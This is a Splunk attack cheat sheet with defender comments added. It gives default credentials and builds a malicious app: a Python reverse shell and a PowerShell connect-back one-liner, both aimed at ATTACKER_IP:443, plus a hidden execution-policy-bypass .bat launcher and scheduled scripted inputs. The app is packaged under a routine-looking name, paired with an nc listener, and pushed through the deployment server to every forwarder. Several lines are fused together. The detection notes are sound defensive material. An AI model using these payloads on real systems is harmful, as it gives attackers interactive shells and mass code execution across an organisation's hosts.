- Default port: 8000
- Often runs as root (Linux) or SYSTEM (Windows), so anything Splunk executes inherits those privileges
- Default credentials:
admin:changeme
# Splunk app skeleton: scripted inputs live under bin/, the inputs.conf that schedules them under default/.
# NOTE: this copy has lost line breaks in several places; the line below fuses the mkdir command with the
# first line of bin/rev.py. The code is left as found, only annotated.
mkdir -p splunk_shell/bin splunk_shell/defaultimport sys,socket,os,pty
# bin/rev.py (Linux side): opens a TCP connection to ip:port, duplicates the socket onto fds 0/1/2,
# then spawns an interactive bash bound to it.
# Defender notes: on the Splunk host this appears as splunkd -> python -> /bin/bash with a socket to an
# external address. The port is 443, so egress filtering alone will not distinguish it from HTTPS; alert on
# the process ancestry (splunkd spawning a shell) and on a script input that was not there before.
ip="ATTACKER_IP"
port="443"
s=socket.socket()
s.connect((ip,int(port)))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
# The next line fuses three things: the last line of rev.py, the entire PowerShell one-liner (the .ps1 that
# run.bat launches), and the `@ECHO OFF` that opens run.bat.
# The PowerShell part: TCP connect-back to ATTACKER_IP:443, a read loop that runs each received chunk through
# iex and sends the output back prefixed with a "PS <cwd>> " prompt.
# Defender notes: PowerShell script block logging (Event ID 4104) records every iex'd command; module logging
# and transcription capture the same. The wrapper's `-exec bypass -w hidden` command line (below) is a
# well-known detection string for a hidden, policy-bypassing launch.
pty.spawn('/bin/bash')$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()@ECHO OFF
# bin/run.bat (Windows side): runs the .ps1 that shares this batch file's base name (%~dpn0) in a hidden
# window with the execution policy bypassed. Splunk's scripted inputs on Windows accept .bat, which is why
# the PowerShell payload is wrapped this way.
PowerShell.exe -exec bypass -w hidden -Command "& '%~dpn0.ps1'"
# The next line fuses run.bat's closing `Exit` with the first stanza header of default/inputs.conf.
# inputs.conf, Linux stanza: the scripted input is enabled (disabled = 0) and re-executed every 10 seconds,
# so the connect-back is retried on that cadence for as long as the app is installed.
# Defender notes: inventory `[script://...]` stanzas across every app's default/ and local/ inputs.conf;
# a new one pointing at a file in an app's bin/ is the artifact to look for.
Exit[script://./bin/rev.py]
disabled = 0
interval = 10
sourcetype = shell
# Windows stanza, same settings, pointing at the batch wrapper.
[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
# The next line fuses the stanza's `interval = 10` with the "# Create tarball" step heading.
# Packaging: the app directory is tarred so it can be installed through the Web UI. The archive name
# (updater.tar.gz) is chosen to look routine; do not rely on the name when triaging uploaded apps.
interval = 10# Create tarball
tar -cvzf updater.tar.gz splunk_shell/
# Upload via Splunk Web UI
# The next line fuses the upload path with the listener command (`nc -lvnp 443`, run on the attacker side
# to receive the connect-back) and the start of the deployment-server note.
# Defender notes: installing an app from file requires an admin-level session, so the default admin:changeme
# credentials above are the enabling weakness — rotate them and restrict who can install apps. App installs
# are recorded in Splunk's own audit trail (the `_audit` index is the usual place to look — confirm for
# your version), and the unpacked app appears under $SPLUNK_HOME/etc/apps/ for file-integrity monitoring.
# Apps → Install app from file → Uploadnc -lvnp 443If compromised host is a deployment server:
# Place app in deployment-apps for mass RCE
# The next line fuses the deployment-apps path with the sentence explaining its effect.
# Defender notes: a deployment server pushes whatever sits in deployment-apps/ to every forwarder in the
# matching server class, so one write here becomes execution on all of them. Treat the deployment server as
# a top-tier asset: restrict write access to that directory, monitor it for new or changed apps, and review
# serverclass.conf changes alongside it.
$SPLUNK_HOME/etc/deployment-apps/All hosts with Universal Forwarders will execute the payload.